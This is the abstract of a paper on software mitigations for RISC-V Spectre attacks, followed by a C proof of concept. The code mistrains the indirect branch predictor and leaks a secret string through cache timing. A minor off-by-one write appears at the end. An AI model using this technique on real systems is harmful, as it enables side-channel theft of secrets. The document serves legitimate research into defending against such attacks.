Software Mitigation of RISC-V Spectre Attacks

Speculative attacks are still an active threat today that, even if initially focused on the x86 platform, reach across all modern hardware architectures. RISC-V is a newly proposed open instruction set architecture that has seen traction from both the industry and academia in recent years. In this paper we focus on the RISC-V cores where speculation is enabled and, as we show, where Spectre attacks are as effective as on x86. Even though RISC-V hardware mitigations were proposed in the past, they have not yet passed the prototype phase. Instead, we propose low-overhead software mitigations for Spectre-BTI, inspired from those used on the x86 architecture, and for Spectre-RSB, to our knowledge the first such mitigation to be proposed. We show that these mitigations work in practice and that they can be integrated in the LLVM toolchain. For transparency and reproducibility, all our programs and data are made publicly available online.

==> sources/indirectBranchFunction.c <==
#include <stdio.h>
#include <stdint.h> 
#include "encoding.h"
#include "cache.h"

#define TRAIN_TIMES 40 // assumption is that you have a 3 bit counter in the predictor
#define ATTACK_SAME_ROUNDS 10
#define SECRET_SZ 5
#define CACHE_HIT_THRESHOLD 50

uint64_t array1_sz = 10;
uint64_t passInIdx;
uint8_t array1[10] = {1,2,3,4,5,6,7,8,9,10};
uint8_t array2[256 * L1_BLOCK_SZ_BYTES];
char* secretString = "BOOM!";

extern void want(void);  
extern void gadget(void);  


int main(void){

    static uint64_t results[256];
    uint64_t start, diff;
    uint64_t wantAddr = (uint64_t)(&want); 
    uint64_t gadgetAddr = (uint64_t)(&gadget);
    uint64_t attackIdx = (uint64_t)(secretString - (char*)array1), randIdx;
    uint64_t passInAddr;
    uint8_t dummy = 0;
    
    char guessedSecret[SECRET_SZ];
    
    for(uint64_t i = 0; i < SECRET_SZ; i++) {

        for(uint64_t cIdx = 0; cIdx < 256; ++cIdx)
                results[cIdx] = 0;

        for(uint64_t atkRound = 0; atkRound < ATTACK_SAME_ROUNDS; ++atkRound) {
            
            flushCache((uint64_t)array2, sizeof(array2));
            
            for(int64_t j = TRAIN_TIMES; j >= 0; j--){
            
                    passInAddr = ((j % (TRAIN_TIMES+1)) - 1) & ~0xFFFF;
                    passInAddr = (passInAddr | (passInAddr >> 16));
                    passInAddr = gadgetAddr ^ (passInAddr & (wantAddr ^ gadgetAddr));

                    randIdx = atkRound % array1_sz;
                    passInIdx = ((j % (TRAIN_TIMES+1)) - 1) & ~0xFFFF;
                    passInIdx = (passInIdx | (passInIdx >> 16));
                    passInIdx = randIdx ^ (passInIdx & (attackIdx ^ randIdx));  

                    // set of constant takens to make the BHR be in a all taken state
                    for(uint64_t k = 0; k < 100; ++k){
                        asm("");
                    }

                    // this calls the function using jalr and delays the addr passed in through fdiv
                    asm volatile(
                        "addi %[addr], %[addr], -2\n"
                        "addi t1, zero, 2\n"
                        "slli t2, t1, 0x4\n"
                        "fcvt.s.lu fa4, t1\n"
                        "fcvt.s.lu fa5, t2\n"
                        "fdiv.s	fa5, fa5, fa4\n"
                        "fdiv.s	fa5, fa5, fa4\n"
                        "fdiv.s	fa5, fa5, fa4\n"
                        "fdiv.s	fa5, fa5, fa4\n"
                        "fcvt.lu.s	t2, fa5, rtz\n"
                        "add %[addr], %[addr], t2\n"
                        "jalr ra, %[addr], 0\n"
                        :
                        : [addr] "r" (passInAddr)
                        : "t1", "t2", "fa4", "fa5");
                
                }
            
            for (uint64_t i = 0; i < 256; ++i){
                    start = rdcycle();
                    dummy &= array2[i * L1_BLOCK_SZ_BYTES];
                    diff = (rdcycle() - start);
                    if (diff < CACHE_HIT_THRESHOLD)
                        results[i] += 1;
            }
        }
        
        uint64_t max = results[0], index = 0;
        for (uint64_t i = 1; i < 256; i++)
            if (max < results[i]) {
                max = results[i];
                index = i;
            }
        printf("The attacker guessed character %c %ld times.\n", index, max);  
        
        guessedSecret[i] = index;
        
        attackIdx++;
    }    
    
    guessedSecret[SECRET_SZ] = 0;
    
    printf("The guessed secret is %s\n", guessedSecret);
   
    return 0;
}

